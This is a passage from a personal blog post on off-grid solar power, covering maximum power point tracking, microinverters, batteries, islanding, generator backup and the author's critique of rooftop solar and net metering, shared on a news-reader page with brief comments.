Look back at the diagram. The top of the power curve is called the "maximum power point" - for what should be obvious reasons. That particular voltage/current point is the absolute maximum number of watts you can get out of the panel at this particular point in time. A more sophisticated charge controller can track this point by sweeping across the range of voltage/current values and finding the maximum power. My main array of 8 panels is hooked up to a MPPT charge controller (a Midnite Classic 200, which runs around $600). If I load things up enough to get them at max power point, they're operating at about 116V/13.8A/1600W (two strings of 4 panels in series instead of one string of 2 like my morning panels). It's a good solar day.  The MPPT controller converts that power into what my battery bank (and the rest of my system) wants - about 27A at 59V.  This is the insides of a Midnite Classic 200, and it's a fairly complicated bit of circuitry (this unit can handle up to 4500W of panel on a 72V battery bank).  This is only doing the maximum power point tracking and DC-DC conversion - it's not even outputting an AC waveform!


What happens when I don't need all that power (assuming the batteries are full)? If my AC compressor is turning, I need about 1.6kW. Shut that down, I'm pulling about 950W. Where does the excess power go?  It simply doesn't get produced in the first place.  A charge controller can restrict the energy drawn by drawing less current than the maximum power point, which lets the voltage float up towards the open circuit voltage (you could also draw more current, but that's a far less stable way to operate).  When I'm pulling 950W, my main array is running at 133V/5.1A/678W, while my morning panels make up the rest (actually, they produce what they can, and the main array makes up the rest). The system only draws as much as is actively being used.

So, going back to the curve: If I try to draw more than whatever the peak power of my panels are (in current conditions), the voltage (and power) collapses. If I tried to pull 2A out of my morning panels when they were facing east and only able to source 1.3A, the voltage would collapse to 0V and the power would drop to zero. What if I try to pull 2A out of them when they're swung out and able to produce 7.4A? Well, I can pull 2A for as long as I want.

The key here is that you cannot pull more than the maximum power from a panel - even by a little bit - without suffering a massive voltage and power collapse.  You can operate below the maximum power point easily enough, but it's hard to identify the maximum power point without sweeping through the whole range to find it.

Microinverters Versus Charge Controllers/Off Grid Inverters

A typical grid tied solar system is built with microinverters.  These are a combination MPPT tracker and inverter for each solar panel, normally in the 280-320W range, though that's creeping up with time as panel output increases.  The output from these synchronizes with the grid - typically 120VAC and 60Hz, in the US. However, they're very simple devices. They don't have onboard frequency generation - they can only work when given a voltage waveform to synchronize against. They also only work at maximum power point - that's their whole point, and when the grid is up, they're connected to what is, from the perspective of a microinverter, an infinite sink. So they sit there, finding the maximum power point, and hammering amps out onto whatever waveform the grid is feeding them.


They also, because they're feeding the grid, have zero surge capability. A 320W microinverter can never source more than 320W, which is fine, because the panel will generally not produce more than 320W. There are conditions where it can, but they're unlikely for roof mounted panels (a very cold, very clear winter day would seem like a case, but the panels aren't typically aligned to take advantage of low winter sun).  When the inverter can't process everything the panel could produce, it's called "clipping," and it's really not that big a problem as long as it's not many hours a year.

But, because of these requirements for the operating environment, microinverters are significantly cheaper to build.  They just need to be able to find max power point and shove that power onto an existing waveform.

An off grid system typically has two different devices - a charge controller (the Midnite Classic shown above) and an inverter (sometimes more than one of each in parallel).  These are separate devices, and cost a good bit more than a microinverter of comparable power.  But, they also work with the battery bank, and have to deal with more amps. A 320W microinverter will typically consume around 10A on the DC side and output about 2.5A on the AC side. My charge controller tops out around 75A on the battery side, and my inverter can pull 125A from the battery bank (peak current).  I've got a massive low frequency inverter that weights about 40lb (for stationary use, I consider power density in inverters an anti-feature - I'd rather have a massive inverter than a tiny one, because they tend to last a lot longer).  My inverter is rated at 2kW, but can source up to 6kW briefly if needed.


Some of the newer systems use a high voltage DC coupled setup - this is how the DC Powerwalls work (which was the Powerwall 1, and was advertised for the Powerwall 2, but then cancelled). For this, you have a very high voltage string of panels (typically 400VDC, either from panels in series or from power optimizers, which are basically a microinverter that outputs high voltage DC), the battery bank hangs on that bus, and the inverter swallows 400VDC and puts out AC.  This works better for higher power systems, but it's not a very common off grid layout.

Batteries

You need batteries in an off grid system for two reasons: Energy storage is the obvious reason, but they also cover peak power demands. Lots and lots of things in a typical home draw far, far more startup power than they do peak power. Anything with a motor is likely to do this, and compressors are particularly bad about this (fridges, freezers, air conditioners, etc). Pretty much any semi-inductive load is going to be a pain to start in terms of current requirements.  Again, using data I have handy, my air conditioner pulls about 700W running, but it pulls somewhere around 2kW, very briefly, when starting. My system is designed for this sort of load (my inverter is a 2kW unit with a 6kW peak surge current capability), but you have to be able to handle that, or the system won't work. If you have purely resistive loads, there's still a startup surge - a typical bulb draws more current on starting as resistance goes up with temperature (you can radically extend the life of incandescent bulbs by putting a negative temperature coefficient resistor in series with them, and this was a popular trick with aircraft landing lights before LEDs got bright enough).  This is another reason off grid inverters tend to be large and heavy - they have to be able to provide that peak power.  Most off grid inverters have a peak power delivery of 2-3x their sustained power delivery, and mine is on the high end, peaking at 3x rated.


Worth noting on batteries: They suffer age related degradation as well as as cycle based degradation. You cannot keep any battery alive forever, even if you don't use it. Lead acid chemistries (flooded, sealed, AGM, whatever) are rarely good past about 10 years, though if you were to keep them really cold you could probably manage it (some of the industrial cells are rated for 15 years, but they're quite a bit more expensive). Lithium... eh.  It supposedly lasts longer, but I treat accelerated lifespan tests as a general guideline to compare batteries instead of full truth.  I make a lot of money on dead lithium, and there's a lot of ways to kill them.  They also require heating in the winter or you'll get lithium plating while charging (which is also a way to kill the capacity).

Let me offer a general guideline on batteries: Any time you put any sort of battery into a power system, the system will never "pay for itself."  There may be specialty cases where this isn't true, but it's a solid first order approximation you should be aware of.  Off grid power is insanely expensive.

Off Grid Without Batteries

Now, how does all of this relate to off grid use without batteries?

If you have a typical grid tied system (microinverters or normal string inverters, so easily 95+% of installed rooftop solar), the system is technically incapable of running off grid (without additional hardware). There's no waveform to sync with, and the inverters cannot produce their own waveform.  Also, they cannot operate at a reduced power output (this is more a side effect of the firmware, but it's true of the vast majority of ones out there). So they can't produce less power than the panels are creating at the moment, and they can't produce more.  And they can't make a valid AC waveform out of it.  You can see how this might be a problem.

If you want off grid capability from a microinverter system, you need what's called an "AC coupled system." This involves a battery bank (uh oh), and an inverter/charger that can suck power from the home's AC grid, as well as deliver it. You generally can't size this to use the whole roof, as a 10kW charger/inverter and a battery bank that can handle that sort of charge rate are really expensive. Basically, this system provides a waveform for the microinverters, sucks excess power, and eventually shuts the microinverters off (usually by pushing frequency out of spec for them). There theoretically exists a setup that can tell the microinverters to back off a bit, and with the newer UL specs, that should be easier with some of the improved ridethrough curves, but... it's complex, and nobody really does this. Generally, you only couple some of the solar panels to the AC coupled setup, because it makes a smaller charger/inverter possible. So you may AC couple 4kW of a 12kW system.

The only real way to get off grid power without batteries is to go with an inverter that has an emergency outlet.  Some of the SMA inverters support this (they call it Secure Power Supply) - you feed the whole rooftop array into them, and they can, if the sun is shining, provide 1.5kW or so to a dedicated outlet - assuming there's enough solar power. So, from an 8-10kW array, on a sunny day, you can get 1.5kW by operating well below the peak power point. If the array can't keep up with current demand (a cloud goes over), the outlet shuts down. It's better than nothing, but this is just about the only way you can get battery-free off grid power. To get any sort of stable battery-free power, you have to run the panels well, well below peak power (30-50% of peak is as high as you can really run), and even then, you have a horrifically unstable system. If the array power briefly drops below demand (perhaps an airplane has flown over), you shut down the entire output for a while. Hopefully your devices can handle intermittent power like this. If the array can source 1300W at the moment and a compressor tries to draw 1301W while starting, you collapse the array voltage and shut down the outlet.  That's really hard on compressors (and everything else attached to the outlet).

If, as some nutjobs prefer, you want sustained off grid running for most of the house, you can design a system with batteries that's intended for this sort of use. I plan to build this, eventually. I'll have 8-12kW of panels on the roof, feeding into a few charge controllers. These will feed into a moderately sized battery bank under my house, and will be coupled to a large inverter that supports grid tied production as well as standalone use (probably an Outback Radian 8kW unit). I'll have most of the house downstream of the inverter, so I can run everything I care about off the inverter - I'll lose some loads like the heat pump backup coils, possibly the stove, but the rest of the house will work, and I'll have enough surge capacity to do things like run the well pump and the air conditioner.  I don't expect this system to ever "pay off" in financial terms, but I value stable, reliable power, and a test lab for this sort of operation.

Or you can separate your backup power from your solar, which I'll talk about a bit later.

So... hopefully that's a bit of a technical overview of how things work. I assure you, most of the furor over this is related to how systems are installed, not "Meanie Power Company Being Evilly Evil."

"Islanding"

One term one will hear tossed about is the concept of "islanding."  This refers to a chunk of the power grid (possibly a single house) that has power while the rest of the local grid is dead.  It's common to hear "anti-islanding" blamed for why a home's solar can't produce power when the grid is dead.  Lineworker safety is usually mentioned in the next sentence.

What this means, simply, is that a local generating system cannot (legally) feed into a dead section of power grid.  For a home power system, this means that unless you have a specific mechanism for disconnecting the home from the power grid (typically called a "transfer switch"), you cannot power the local home circuits from solar or generator.

Now, that said, it's really less of an issue than it's made out to be.  Backfeeding the power grid, according to some lineworkers I've talked to, is really not a big concern for two reasons. First, lineworkers assume lines are live until proven otherwise.  And, second, no residential system is going to successfully backfeed a large dead section of grid.  The grid without power looks an awful lot like a dead short, so the microinverters or string inverters or generator or whatever will instantly overload and shut down. It's in the regulations, but it's really not that big a concern from a technical/safety perspective.

But, if you haven't explicitly set your system up to support islanded operation with a transfer switch and battery, your solar won't power your house with the grid down.

It's Not Power Companies Being Evilly Evil - It's Homeowners Being Cheap

Why have I written all this?  To explain (hopefully) that the reason most solar power systems won't work off grid has literally nothing to do with power companies being evil and demanding that you buy their power.  It has everything to do with the system not being designed to run off grid.  Why are they designed that way?  Because it's cheaper.  Period.  A microinverter based system is substantially cheaper than anything with batteries (which will need regular replacement), and that's what people get installed when they want a reasonably priced bit of rooftop solar to save money on their power bill.

If you want to get a rooftop solar system that powers your home with the grid down, you can do it!  The hardware is out there.  But such a system will be significantly more expensive than a normal grid tied system, and it will likely never "pay off" in terms of money saved.  That's all.

So stop blaming the power companies for homeowners buying a grid tied system (because it's cheap) and then complaining when it won't run off grid.  That's like complaining that a Mazda 3 won't tow a 20k lb trailer.

The Cheap Path to Backup Power

Now, if you want emergency backup power, and your goal isn't to spend a comically large sum of money on a system like I'm designing (the ROI on my system design is "never" if you don't value sustained off grid power use), the proper solution is a generator. I highly, highly suggest a propane (or natural gas, if you have that) generator - it's so much easier to store propane than gasoline without it going bad. Ten year old propane is fine. Ten year old gasoline is a stinky, gummy varnish.  Says the guy with an extended run tank for his gasoline generator.


A generator and transfer switch is the right option for almost everyone interested in running through a power outage.  The solar feeds into the grid side of the transfer switch, the generator feeds into the house side.  When the power goes out, flip the transfer switch, light the generator, and go.  Or, if you get really fancy, you can get an automatic transfer switch that will even start the (expensive) generator for you!

This doesn't give you uninterrupted power (there's still a blip when the power sources change), but it's far, far cheaper than putting your house on a giant inverter and adding batteries.

Can't Microinverters Sync to a Generator?

If the microinverters need a waveform to sync with, couldn't you create that waveform with a generator or a tiny little inverter and have the rooftop units provide the rest of the power?

Unfortunately, no.  A microinverter generally won't sync to a generator - and if it could, it wouldn't work anyway. Most fixed RPM generators (typically the cheaper open frame generators, running at 1800 or 3600 RPM) put out such amazingly terrible power quality that a microinverter will refuse to sync against them. Put one on a scope if you have one. They're bad. It's very nearly electronics abuse to run anything more complicated than a circular saw from them.

You can perhaps get the microinverters to sync against an inverter generator, but then where will the power go? Let's say you've got a 3kW Honda and an 8kW array - not an uncommon setup. You start the generator, the freezers and such start up, pull 1500W. The microinverters sync, and with the sun, start trying to dump 4-5kW onto the house power lines. The Honda will back off, since it looks like a load reduction, but you've got 4000W of microinverter output trying to feed 1500W of load, and the microinverters won't back off. What they'll do is drive voltage or frequency high, shut down, and then the Honda has to pick up the 1500W load instantly. And you'll do this over and over. If you don't destroy the generator, you'll probably destroy the loads. It just doesn't work.

The AC coupled systems solve this by saying, "Well, I'll just pull power into the battery bank until it's full." So they'll let 1500W of that output from the rooftop units feed the freezers, and pull the other 2500W into the battery bank, so things are stable. And then shut down the microinverters by pushing frequency out of spec when the batteries are full.

UL 1741 SA compliant inverters might be able to be tricked into partial output, but I don't think that's likely to be very stable for long.

Small Scale Battery Backup

Another valid option for backup power (as pictured in the title picture) is some sort of small battery box (with or without solar).  I built a 1kWh power toolbox (with solar capability) last summer, and that can run at least some useful loads if we lose power.  Goal Zero makes some nice equipment in this realm, if somewhat pricey.  Though, really, my "power is out for a long while" plan involves my generator and some extension cords, for now.

Power Grid Stability and Rooftop Solar

While I'm on the topic of residential solar, I'd like to talk a bit about why I'm not a huge fan of it, as commonly implemented.  This often surprises people who assume I have to be massively pro-solar (based on my off grid office and how much I write about it), but I don't think that residential rooftop solar is a particularly good idea, and I'm a far bigger fan of utility scale solar deployments ("Community Solar" and large commercial solar farms).  I'm genuinely excited to find new solar farms when I'm out flying, and they keep popping up like weeds in my area.  Most of the utility scale solar out here is single axis trackers, which help with evening out power production throughout the day (and, importantly, help with production in the morning and evening).  They're awesome, and I'd love to tour one of the plants one of these days.  If you're a solar company in the Treasure Valley, I promise I'll be very impressed if you take me on a tour!

Why am I not a huge fan of rooftop solar?  I'll dive into that shortly, but, fundamentally, rooftop solar is a bad generator.  It tends to be focused on maximizing peak production (at the cost of useful production), because the incentives are for peak kWh, not useful kWh.  And, worse, rooftop solar is a rogue generator.  The power company has no control over the production (which peaks at solar noon and goes away whenever there's a cloud), and the power is the equivalent of sugar - empty VARs.  I think the power grid is pretty darn nifty, and I'm a huge fan of keeping it running.  Rooftop solar, as currently implemented, is really very much at odds with a working power grid.

The Grid as Your Free Battery

Typically, rooftop solar is on some variety of "net metering" arrangement.  This means that if you pump a kWh of energy onto the grid, you can pull a kWh off.  You get to use the grid as your free, perfect, seasonal battery - which is an absolutely stunning, amazing, sparkling deal for the homeowner.  No battery technology out there does this, except the power grid!

It's kind of a crap deal for the power companies, though.  In exchange for you putting a kWh onto their grid, whenever your system happens to have some excess excess, you get to pull a kWh off their grid - for free - whenever you happen to need it.  This is the sort of arrangement you put in place when the only people who have rooftop solar are the kooks (say, the 80s or 90s), and you can safely ignore them.  It does NOT work well when more and more people have rooftop solar, and are demanding that the grid bend to their needs, not the needs of grid stability.  I'll talk about this more in the grid maintenance section.

Inertia/Frequency Stability/Empty VARs/Restart Behavior

A related issue for grid stability is the lack of inertia (or synthetic inertia) in residential solar installs.  This is getting slightly better with the UL 1741 SA listed inverters, but they still only fix it in one direction.

What's inertia, in the context of power systems?  Literally that - traditionally it's been provided by the inertia of the large spinning generators, their turbine systems, gearboxes, etc.  Rotational inertia!  Without diving into the details, this provides the first order response to grid load changes by countering frequency changes mechanically.  If there's a sudden spike in load (or a generation station trips off), the initial response by the grid is that the frequency tries to drop (as more power is demanded of the remaining generators).  The drop in frequency is caught by the plant throttles that add more steam (if available) to the turbines, and then the grid tries to add capacity to seek the correct frequency.

Microinverters generally don't offer any grid stability services.  They simply match what's present - and, worse, most of the deployed ones trip off if the frequency gets too far away from spec.  So, if the grid frequency drops from a high load situation, the inverters may trip off and reduce generation even more.  It's a positive feedback loop, and not a good one.

This sort of stability-free generation doesn't matter as much if there are only a few people with rooftop solar, but it's the sort of thing that leads to emergent instability if there are a lot of people with solar.

The recent UL 1741 SA tests (and related IEEE 1547 standard updates) address this significantly by radically increasing the ride-through windows and allowing for curtailed output if the frequency or voltage is too high, but residential inverters still only operate in the "curtail output" side of the standard.  They can't (won't?) do something useful like operate at 80% of maximum power, so they can respond instantly to a lowered frequency on the grid by adding power.  Solar can respond nearly instantly to a load demand, but only if it's operating below the maximum power point to start with.

But, even with those changes, there's still the potential for some sort of emergent oscillation to arise.  At some point, there will be little enough effective inertia on some grid segments that something quite interesting will happen, and I expect rooftop inverters to be significantly at fault from how they respond to some unexpected trigger pattern.

Power Production/Duck Curve Issues

Related, rooftop solar tends to be aimed as south as possible, to maximize peak production.  That maximizes power generated, but it doesn't maximize grid utility of the power.  Peak demand tends to be in the morning and evening, and south aimed solar doesn't help with this.

If you've paid attention to solar, you've seen the "duck curve" in various articles.  It relates to the reduced demand on generating plants during the middle of the day, and the increasingly brutal ramp rate (rapid changes in power plant output) to deal with the increase in evening load, right as the rooftop solar is dropping off.  Since the utility has no control over individual rooftop inverters, they basically have to "just deal with it."  This is part of why we're seeing an increase in natural gas turbine plants - they can load follow better than other plant designs (including nuclear).

A utility scale solar plant can help resolve this in multiple ways.  Most of them tend to be on single axis trackers, which helps extend their production into the morning and evening - at the cost of peak production in the middle of the day.  In addition, a utility solar plant can bid into various grid services, can operate curtailed (less than 100% output to provide headroom for frequency stability, or to provide stable output despite clouds), and generally is far more useful to the grid than rooftop solar.  And, if you want to pair storage with it, it can behave much as a traditional power plant in terms of power bidding.

Utility Grid Costs/Maintenance

Finally, rooftop solar (with net metering) leads to a push of grid maintenance costs away from those who have rooftop solar, onto those who don't.

Net metering, as I explained above, is using the grid as an ideal, free, battery.  And it's the free part that causes problems.

I touched on demand charges a few months back when I looked at Tesla's Megachargers and operating costs, but for any sort of serious load (industrial/commercial use), your power bill consists of two separate items: Energy charges, and demand charges.  Energy charges are per-kWh used, and are, by residential standards, absurdly cheap.  In the range of $0.04/kWh or less "cheap."  But, separately, you pay demand charges - which are per kW charges, over the peak demand in the month (usually over a 15 minutes or an hour).  If you use very little energy overall, but pull 1MW for an hour, you'll be paying out the wazoo in demand charges.

The reason for this is that energy, on the grid, is actually quite cheap.  The actual cost of a kWh on the grid is typically around $0.02-$0.04.  The rest of the rate (for residential rate schedules) is the demand charge, just woven into the per-kWh rate.  Generally, you'll see some level at which the cost per kWh goes up, which is effectively the same as demand charges increasing (because someone who uses 2MWh/mo is going to need a bigger feed and more supporting grid hardware than someone who only uses at 200kWh/mo).

When you are producing on a residential schedule (which is what net metering effectively is), you break the assumptions bound into the rate schedule, quite to your benefit.  Someone with rooftop solar who is exporting enough to the grid to null out their bill is using the grid quite "for free," despite making heavy use of the grid for both exporting their excess (when they happen to have it) and making up the lack (whenever the want it).

With demand charges, it would matter less, as you'd be separating out your grid use from your energy use, but right now, with net metering, the deal is this: "I'll ship you power whenever I have surplus, you give me full rated power whenever I want it, you have no control over it, and I pay you nothing for using your power grid."

This is not a particularly good way forward.

Closing Thoughts

Several thousand words later, hopefully you understand better why solar panels don't magically let you use power without the grid.  And, hopefully, you can now communicate this any time you see that sort of nonsense showing up on the internet.  Or link them here.  Whichever.

If you want affordable backup power, just buy a generator and wire in a transfer switch.

Let me know in the comments if there are areas you find unclear, and I'll attempt to clarify them.
Read the whole story
zwol
25 days ago
reply
Pittsburgh, PA
Share this story
Delete
1 public comment
satadru
25 days ago
reply
This was a fascinating longread.
New York, NY
Next Page of Stories